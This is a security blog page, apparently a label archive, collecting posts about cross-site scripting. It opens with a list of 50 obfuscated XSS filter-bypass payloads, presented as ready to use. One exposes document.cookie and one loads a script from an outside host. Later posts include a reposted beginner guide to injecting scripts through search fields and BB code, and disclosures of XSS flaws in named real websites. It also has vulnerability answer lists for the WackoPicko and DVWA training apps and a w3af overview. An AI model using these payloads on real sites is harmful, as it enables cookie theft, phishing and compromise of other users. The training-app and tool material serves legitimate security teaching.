Showing posts with label cross site scripting. Show all posts
Showing posts with label cross site scripting. Show all posts

Monday, 19 November 2012

50 Awesome XSS Vectors From @soaj1664ashar

Here are 50 awesome XSS vectors that @soaj1664ashar has been tweeting over time. Can be quite useful for bypassing any filter with the help of these full baked vectors.

50 awesome XSS vectors that I have tweeted (@soaj1664ashar) over time. Enjoy! Now you can bypass any filter with the help of these full baked vectors :-)

1) <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button>
2) <div onmouseover='alert&lpar;1&rpar;'>DIV</div>
3) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">
4) <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a>
5) <embed src="!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
6) <object data="!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
7) <var onmouseover="prompt(1)">On Mouse Over</var>
8) <a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>
9) <img src="/" =_=" title="onerror='prompt(1)'">
10) <%<!--'%><script>alert(1);</script -->
11) <script src="data:text/javascript,alert(1)"></script>
12) <iframe/src \/\/onload = prompt(1)
13) <iframe/onreadystatechange=alert(1)
14) <svg/onload=alert(1)
15) <input value=<><iframe/src=javascript:confirm(1)
16) <input type="text" value=``<div/onmouseover='alert(1)'>X</div>
17) http://www.<script>alert(1)</script .com
18) <iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>
19) <svg><script ?>alert(1)
20) <iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
21) <img src=`xx:xx`onerror=alert(1)>
22) <object type="text/x-scriptlet" data=" "></object>
23) <meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
24) <math><a xlink:href="//">click
25) <embed code="" allowscriptaccess=always>
26) <svg contentScriptType=text/vbs><script>MsgBox+1
27) <a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a
28) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>
29) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
30) <script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F
31) <script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script
32) <object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
33) <script>+-+-1-+-+alert(1)</script>
34) <body/onload=&lt;!--&gt;&#10alert(1)>
35) <script itworksinallbrowsers>/*<script* */alert(1)</script
36) <img src ?itworksonchrome?\/onerror = alert(1)
37) <svg><script>//&NewLine;confirm(1);</script </svg>
38) <svg><script onlypossibleinopera:-)> alert(1)
39) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
40) <script x> alert(1) </script 1=2
41) <div/onmouseover='alert(1)'> style="x:">
42)  <--`<img/src=` onerror=alert(1)> --!>
43) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
44) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>
45) "><img src=x'');>
46) <form><button formaction=javascript&colon;alert(1)>CLICKME
47) <math><a xlink:href="//">click
48) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
49) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>
50) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

Or Grab from pastebin :)


Tuesday, 13 December 2011

Art of hacking 3 - spyd3rm4n's guide to hacking

This series of articles can be very useful for many beginners out there but after the thedefaced and darkmindz went down, I haven't really seen these articles anywhere else. So I thought to share this article over here. Its NOT written by me and I would like to provide the full credit to the original author as well.

Previous articles:
Part 1

Part 2

spyd3rm4n's guide to XSS Injection

Part 3

[0x01] XSS_Definition
[0x02] Pen-Testing
[0x03] Common Fields
[0x04] Escaping_BB_Code
[0x05] Image_XSS

Sub XSS_Defnition{

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Recently, vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. Cross-site scripting was originally referred to as CSS, although this usage has been largely discontinued.

-Taken from Wikipedia Wikipedia if you want to read more.

Sub Pen-Testing{

Pen-Testing, short for Penetration Testing. Pen-testing with XSS can be very easy, or very hard. It depends on the person doing this. Some common queries when pen-testing a field can include but are not limited to:

<script language="javascript">alert(1)</script>
<script src="">
<img src="">

A great site to find some of the most useful queries it

Now, once you've tested the fields, if the following page returned contains any sort of popup/javascript. You know it's vulnerable.


Sub Common_Fields{

Some of the most common fields that I have noticed are search fields. These will most likely return the following page showing the input.

Example: I search for "Orson Wells" and the page returned: 0 Results for query "Orson Wells" or something of that sort.

There are simple ways to get around this, since I am a php coder, my favorite way is the htmlentities(), you can also use strip_tags().

Some other search engines might not show what you searched for on the page itself, but in the field, the value is still there.

If this is the case, you can search for '"/></>[XSS]

this should escape the html field value, if it is not sanitized correctly and execute the [XSS] on the page.

Basically, any field that asks for user input that is either POST or GET and is in the source of the following page, can be cross-site scripted if not properly sanitized.


Sub Escaping_BB_Code{

This is one of my favorite ways to XSS a site. Some people decide to create their own BB code or use on that is poorly sanitized. This can be very easy to exploit.

Let's say there is an option to make my font red using hte [font color="red"] BB code.

Well, if I post a message with [font color="red"]hi[/font] and I look at the next page's source code, I see <font color="red">hi</font>,

I will re-post using

[font color="red"></font><script>alert(/hi/)</script>]hi[/font]

And if it is poorly sanitized, the page following it would contain an alert box saying /hi/.

There are so many different ways to escape BB code it is almost too easy. Some other sites have [IMG]. This one can be easy also.

[IMG]"></><script src=>[/IMG]

would have

<img src=""></><script src=>


Sub Image_XSS{

This is probably the best discovery to XSS since, whenever. With this, you can place javascript inside an image and have it execute in Internet Explorer.

Reffer to:



Sunday, 13 November 2011 Persistent XSS Vulnerability

A very very popular website that provides resources to the beginner, intermediate and advanced programmers, suffers from persistent XSS vulnerability which is very critical.

Original credits for finding the flaw goes to Learn3r aka DaNePaLI who suggested me the vulnerability and gave permission to mail it to the team.

Check the URL to see the vulnerability in action.



Tuesday, 30 August 2011

XSS Vulnerability in

The popular girl's online game play site suffers from a cross site scripting vulnerability. The GET parameter "error_message" is not properly sanitized and allows the injection of HTML and javascript code.

Check the vulnerable URL.

I've notified the ladypopular team about the vulnerability.


Tuesday, 10 May 2011

Learn Web Hacking With WackoPicko

WackoPicko is a website that contains known vulnerabilities. It can prove as a very efficient way to master web hacking skills. This project is similar to Damn Vulnerable Web Application and is a collection of common web vulnerabilities.

For more information and downloads, you can check the WackoPicko github page.


Reflected XSS
The query parameter is vulnerable.

Stored XSS
The comment field is vulnerable.

SessionID vulnerability
The session cookie value is admin_session, which is an auto-incrementing value.

Stored SQL Injection
http://localhost/users/register.php -> http://localhost/users/similar.php
The first name field of the register users form contains a stored SQL injection which is then used unsanitized on the similar users page.

Reflected SQL Injection
The username field is vulnerable.

Directory Traversal
The tag field has a directory traversal vulnerability enabling a malicious users to overwrite any file the web server uses has access to.

Multi-Step Stored XSS
The comment field is vulnerable to XSS, however must go through a preview form.

Forceful Browsing
The user doesn't have to purchase the picture to see the high quality version.

Command-line Injection
The password field is vulnerable to a command line injections.

File Inclusion
The page is vulnerable to a file inclusion vulnerability, however you have to include at the end.

Parameter Manipulation
The userid parameter can be manipulated to see any user's page when you need to be logged in otherwise.

Reflected XSS Behind JavaScript
The name parameter is vulnerable.

Logic Flaw
A coupon can be applied multiple times reducing the price of an order to zero. The coupon in the initial data is SUPERYOU21.

Reflected XSS Behind a Flash Form
The value parameter is vulnerable.

Weak username/password
There is a default username/password combination of admin/admin.


Thursday, 21 April 2011

Practise, Learn and Master Web Application Hacking With DVWA

DVWA, which stands for Damn Vulnerable Web Application, is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

The DVWA v. 1.07 can be downloaded from HERE.

You will need to install Apache+PHP+MySQL environment(use LAMPP or XAMPP packages) to run and test this web application. This will definitely help you learn to spot web vulnerabilities of the varied levels. I hope this was useful. :)


Thursday, 14 April 2011

Web Application Attacking and Auditing with W3af Framework.

w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

W3af is the tool written totally in Python and supports many techniques for detecting and exploiting the web based vulnerabilities.
Framework features

w3af provides plugin writers with this features:
urllib2 wrapper
In order to send requests to the remote server w3af uses urllib2. The xUrllib module of w3af is a wrapper of urllib2 to make the plugin writer life easier, using this wrapper a plugin writer can forget about proxy's, proxy auth, basic/digest auth, etc. This is the complete list of features provided by xUrllib:

- Proxy
- Proxy auth ( basic and digest )
- Site auth ( basic and digest )
- Gracefully handle timeouts
- UserAgent faking
- Add custom headers to requests
- Cookie handling
- Local cache for GET and HEAD requests
- Local dns cache, this will speed up scannings. Only one request is made to the DNS server
- Keep-alive support fot http and https connections
- File upload using multipart POST requests
- SSL certificate support

Output Management
w3af provides plugin writers with an abstraction layer for data output using the Output Manager. The output manager can also be extended using plugins and can be used for writing results to a txt/html file or sending them over the network using scp, the options are endless. Available ouput plugins are:
- Console
- Text file

Web Service support
w3af knows how to parse WSDL files, and audit webservices. Plugin developers can write a simple plugin that will be able to find bugs in web services and also in common HTTP applications.

HTTP headers fuzzing
w3af supports finding bugs in HTTP headers with great ease!

IPC ( inter plugin communication :P) can easily be done using the knowledge base, another w3af feature thats really usefull for plugin developers.

Session saving
Framework parameters can be saved to a file using the sessionManager. After that, you can load the settings and start the same scan again without configuring all parameters.

Right now w3af has a really simple fuzzer, but we have plans to extend it. Fuzzers are great, we know it.

HTML / WML parsing
w3af provides HTML / WML parsing features that are really easy to use.

To install w3af under your ubuntu, type the following in the terminal.

sudo apt-get install w3af

Visit w3af homepage


Sunday, 12 September 2010 Vulnerable to XSS

Today, I was trying to download some file from ziddu and since the author had already deleted the file, I was redirected to the error message page. And I thought of playing around with the message from GET params which was being displayed into the page.

I first added <i> and </i> in between the message and found that the HTML tags were not being filtered. Then I used the <script> tag and tried to do the alert but they were adding backslashes in the single and double quotes...
Then I used the String.fromCharCode() JS function and the alert appeared in the site..,65,77,65,82%29%29;%3C/script%3E suffers from the XSS and I've notified them.